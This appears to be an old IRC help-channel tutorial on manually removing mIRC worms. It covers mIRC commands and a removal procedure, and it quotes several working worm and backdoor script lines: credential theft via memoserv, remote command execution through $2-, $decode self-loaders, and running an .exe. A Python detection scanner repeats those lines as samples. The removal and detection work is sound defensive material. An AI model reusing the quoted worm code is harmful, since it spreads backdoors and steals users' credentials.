TrojanInfo.com

************************************************************************* *************************************************************************

First some basic mIRC commands that will help you:

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$script()

Returns the filename for the Nth loaded script file. If you specify a filename, it returns $null if the file isn't loaded.

$script(0) returns the number of script files loaded.
$script(2) returns the filename of the 2nd loaded script file.
$script(moo.txt) returns $null if the file isn't loaded, or moo.txt if it is.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$findfile(dir,wildcard,N)

Searches the specified directory and its subdirectories for the Nth filename matching the wildcard file specification and returns the full path and filename if it is found.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$exists(filename) Returns $true if a file exists and $false if it doesn't.

$exists(c:\mirc\mirc.exe) returns $true or $false.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
/play [channel/nick/stop] [delay] This is a powerful command that allows you to send text files, or parts of them, to a user or a channel.

The delay is in milliseconds. If you play files too quickly to a server you will probably be disconnected for flooding. The default setting is 1000, i.e. 1 second. Empty lines between text are treated as a delay.

/play c:\text\mypoem.txt 1500

The -t switch forces mIRC to look up the specified topic in the file and play all lines under that topic. For example:

/play -trfiles c:\help.txt

To stop the playing of a text file and clear the queue you can use /play stop.

-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-=-=--=-=-=-
$read and $readn read a line from a file and insert it at the current position in an alias command. The format is:

$read [-ntl# -swtext]

************************************************************************* *************************************************************************
How do we use these commands?

The most common types of viruses on IRC are the mIRC worms. There are two main strains, each with several variants: the //decode ones and the server.ini ones. This tutorial will not go into detail about the server.ini ones, as that could fill a whole class on its own.

Below is how the above commands are used during the removal of basic mIRC worms.

//say $script(0) - Establishes how many scripts the user has loaded.
//say $script(1) - Says the name of the first loaded script. This step may be repeated for each file they have loaded, as indicated by $script(0).
//!remove Filename - Deletes the file from the user's machine.
//!unload -rs Filename - Unloads the remote script so mIRC stops running it.

If $script(0) returns many files (i.e. more than 5), it is better to use the play command:

//!play -trfiles HELPERNICKHERE mirc.ini 2000

This command will message you all the scripts they have loaded. It's important for the 2000 to be at the end, or the user will Excess Flood and be disconnected; with newbie users this will confuse them even more. So always use 2000.

//say $findfile(c:,FILENAME,0) - Tells how many copies of a particular filename are located on c:\. When removing viruses like server.ini, it must be removed from every mIRC installation: if a user has 5 mIRCs installed, you will need to find all the server.ini files.

//say $findfile(c:,server.ini,2) - Returns the 2nd server.ini on c:\. If there isn't one, it returns an error to the user and displays no output.

************************************************************************* *************************************************************************
How do we know when to use these commands?

Normally a user will enter the channel and know they have some sort of virus, or have been sent to get help with a virus. Below are the steps that should be taken for mIRC worms.

1. Cycle the channel and look for any auto messages.
2. If an auto message is given and it is spamming a website, then it is likely a mIRC worm.
3. Find the file that has the virus script in it using //say $script(0).
4. If scripts > 5 then use //!play, otherwise use //say $script(1) ....
5. Once the file is located, remove it and unload it.
6. Depending on the type of file, more steps may need to be taken.

************************************************************************* *************************************************************************
How do we know what's a virus file?

Usually the name of the file gives it away as previous ops have noticed trends in virus names.

Common names for the //decode ones include Ä nkie.txt, m|rc32.ini, twg.txt and many others. Most of the website-spamming worms are server.ini or script.ini.

Note that script.ini is the default name for mIRC scripts, so you should check whether it is really a worm before getting a user to delete it. To do this use

/dcc send HELPNICKHERE filehere

or /play HELPNICKHERE filehere 2000 (NEVER forget the 2000 or they will excess flood)

So what does a virus file look like? Here are some examples:

Pr.ini (this is a backdoor script similar to many server.ini)

n2=on *:INPUT:*: { haltdef | /echo -a < $+ $me $+ > $1- | msg %chan --Warning- (Input command) $1- | /clearall | //run temp2.exe /n /fh | halt }

script.ini (a lame backdoor script)

n29=on *:input:*:{ if (identify isin $1-) { if (dalnet == $network) { .ignore memoserv | .memoserv send war_man $1- | .timer 1 30 /.ignore -r memoserv } } }

® (a weird ASCII file using one of these //decode worms)

on *:join:#:.timer 1 30 if ( $nick !isop $chan ) .msg $nick Type This to Hack Someone!:12 //$ $+ decode( $encode(write ® $read($script,n,1),m) ,m) $ $+ chr(124) $ $ $+ + decode( $encode(.load -rs ®,m) ,m)

I can't remember the filename, but:

on ^*:text:@@*:*:haltdef | $2-

This command allows the attacker to execute any command on the infected machine.

in.txt

ctcp *:N:*:{ . $+ $2- | halt }

twg.txt

on *:text:!list:#: notice $nick 7[4Fserve7] Trigger:[4//.write $ $+ decode( $encode(twg.txt $read($script,n,1),m) ,m) $chr(124) $ $+ decode( $encode(/.load -rs twg.txt,m) ,m) 7] Note7[4DVD RIPS!!7]
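The samples above share a few recurring traits: a $decode wrapper that hides the real command, a write ... $read($script,...) self-copy followed by .load -rs, a handler that runs an .exe, and ctcp/text handlers that hand $2- straight to the command parser. The Python script below is an added example (it is not part of this tutorial and not a mIRC feature) that scans a remote-script file for those traits; the sample lines in it are constructed from the ones quoted above, with the colour control codes left out, plus one harmless greeter line for contrast.

```python
"""Heuristic scanner for mIRC remote-script files (script.ini, the remotes
listed in mirc.ini, or plain .txt scripts).

Added example for this tutorial, not part of the original page or of mIRC.
It looks for the patterns the worm samples in the tutorial share:
$decode-based self-loaders, ".load -rs" of the script itself, running an
.exe, and event handlers that pass attacker-supplied text ($2-) straight to
the command parser.  SAMPLE_SCRIPT below is constructed from those samples.
"""
import re

# (indicator name, strength, regex).  A "strong" hit alone marks a line as
# suspicious; a "weak" one only counts together with another indicator.
INDICATORS = [
    ("decode_loader", "strong", re.compile(r"\$\s*\$\+\s*decode\(|\$decode\(|decode\(\s*\$encode\(", re.I)),
    ("self_load",     "strong", re.compile(r"\.?load\s+-rs\b", re.I)),
    ("self_write",    "strong", re.compile(r"\bwrite\b.*\$read\(\s*\$script\b", re.I)),
    ("runs_exe",      "strong", re.compile(r"\brun\s+\S+\.exe\b", re.I)),
    ("ctcp_backdoor", "strong", re.compile(r"^ctcp\s+\*:\S*:\*:\s*\{?\s*\.\s*\$\+\s*\$2-", re.I)),
    ("text_backdoor", "strong", re.compile(r"^on\s+\^?\*:text:[^:]*:\*:\s*(?:haltdef\s*\|\s*)?\$2-", re.I)),
    ("input_leak",    "strong", re.compile(r"^on\s+\*:input:.*?\b(?:msg|memoserv\s+send)\b", re.I)),
    ("join_msg_nick", "weak",   re.compile(r"^on\s+\*:join:.*\.?msg\s+\$nick", re.I)),
]

INI_PREFIX = re.compile(r"^n\d+=")   # "n29=on *:input..." as stored in .ini files


def normalise(line):
    """Strip the .ini 'nNN=' prefix and surrounding whitespace."""
    return INI_PREFIX.sub("", line.strip())


def indicators_for(line):
    """Return the names of all indicators that match one script line."""
    code = normalise(line)
    return [name for name, _, rx in INDICATORS if rx.search(code)]


def is_suspicious(line):
    """True if a strong indicator hits, or at least two indicators hit together."""
    hits = indicators_for(line)
    strength = {name: s for name, s, _ in INDICATORS}
    return any(strength[h] == "strong" for h in hits) or len(hits) >= 2


def scan_script(text):
    """Scan a whole script file.  Returns [(line_no, code, [indicators])] for
    suspicious lines only; blank lines, [section] headers and ; comments are skipped."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        code = normalise(raw)
        if not code or code.startswith("[") or code.startswith(";"):
            continue
        if is_suspicious(code):
            findings.append((no, code, indicators_for(code)))
    return findings


# Constructed sample: the tutorial's worm lines (colour codes removed, the
# garbled "$ $ $+ +" in the ® sample tidied to "$ $+") plus one benign greeter.
SAMPLE_SCRIPT = """[script]
n0=on *:JOIN:#help: notice $nick Welcome to $chan $+ ! Please describe your problem.
n1=on *:INPUT:*: { haltdef | /echo -a < $+ $me $+ > $1- | msg %chan --Warning- (Input command) $1- | /clearall | //run temp2.exe /n /fh | halt }
n2=on *:input:*:{ if (identify isin $1-) { if (dalnet == $network) { .ignore memoserv | .memoserv send war_man $1- | .timer 1 30 /.ignore -r memoserv } } }
n3=on ^*:text:@@*:*:haltdef | $2-
n4=ctcp *:N:*:{ . $+ $2- | halt }
n5=on *:text:!list:#: notice $nick [Fserve] Trigger:[//.write $ $+ decode( $encode(twg.txt $read($script,n,1),m) ,m) $chr(124) $ $+ decode( $encode(/.load -rs twg.txt,m) ,m) ] Note[DVD RIPS!!]
n6=on *:join:#:.timer 1 30 if ( $nick !isop $chan ) .msg $nick Type This to Hack Someone!: //$ $+ decode( $encode(write ® $read($script,n,1),m) ,m) $ $+ chr(124) $ $+ decode( $encode(.load -rs ®,m) ,m)
"""

if __name__ == "__main__":
    for no, code, hits in scan_script(SAMPLE_SCRIPT):
        print(f"line {no}: {', '.join(hits)}\n    {code}")
```

Run it over a script a user has sent you with /dcc send (see above) before telling them to delete anything: the greeter on line 2 produces no hit, while every worm line is reported with the trait that gave it away. The patterns are heuristics written from the samples on this page, so a new variant may need a new entry in INDICATORS.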

************************************************************************* *************************************************************************
What about other viruses?

The above commands, used in combination, can remove 80% of mIRC viruses if you read the virused file and remove any files referenced in the scripting.

When a user is sending DCC files again, you can use this to locate the virus script, but there are specific removers, as some viruses also spread through Outlook, so all of their files need to be removed.

************************************************************************* *************************************************************************
Where to now?

I suggest you practice using these commands; save just the commands to a separate .txt file and use them for reference when helping users. Whenever you find a user is infected, get a copy of their virus and read the scripting. This will help you understand how they work and what to look for next time.

Eventually you will have enough experience to recognise the virus file name just from the user's auto message, or to locate the source of a virus from the user's symptoms.

EOF.

This is just a brief introduction to the tools we used when manually removing viruses. Currently I'm compiling information about how to remove a range of viruses by automatic removal / manual removal / mIRC, so I will have these available in the future.

Any questions, please contact me on IRC.DAL.NET in either #Help, #Nohack or #IRCSecure.

Moby